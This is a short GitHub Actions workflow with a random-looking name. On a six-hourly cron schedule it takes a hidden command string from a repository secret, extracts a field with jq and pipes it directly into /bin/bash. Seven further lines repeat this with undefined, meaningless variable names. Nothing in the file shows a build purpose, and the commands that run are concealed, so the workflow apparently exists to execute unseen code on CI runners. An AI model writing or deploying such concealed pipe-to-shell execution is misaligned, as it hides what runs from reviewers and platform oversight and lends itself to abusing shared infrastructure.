name: gechundan5678

on:
  workflow_dispatch:
  schedule:
    - cron: '50 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gechundan5678
        env:
          mm6: ${{ secrets.mm6 }}
        run: |
          echo $mm6 | jq -r .gvm132 | /bin/bash
          echo $t6366 | jq -r .ir12382 | /bin/bash
          echo $yiqhz90 | jq -r .uo76 | /bin/bash
          echo $ej29378 | jq -r .pcfr5 | /bin/bash
          echo $a33 | jq -r .gutm60633 | /bin/bash
          echo $d114 | jq -r .lhd43 | /bin/bash
          echo $q8248 | jq -r .tu67444 | /bin/bash
          echo $eqnd5 | jq -r .wz03 | /bin/bash

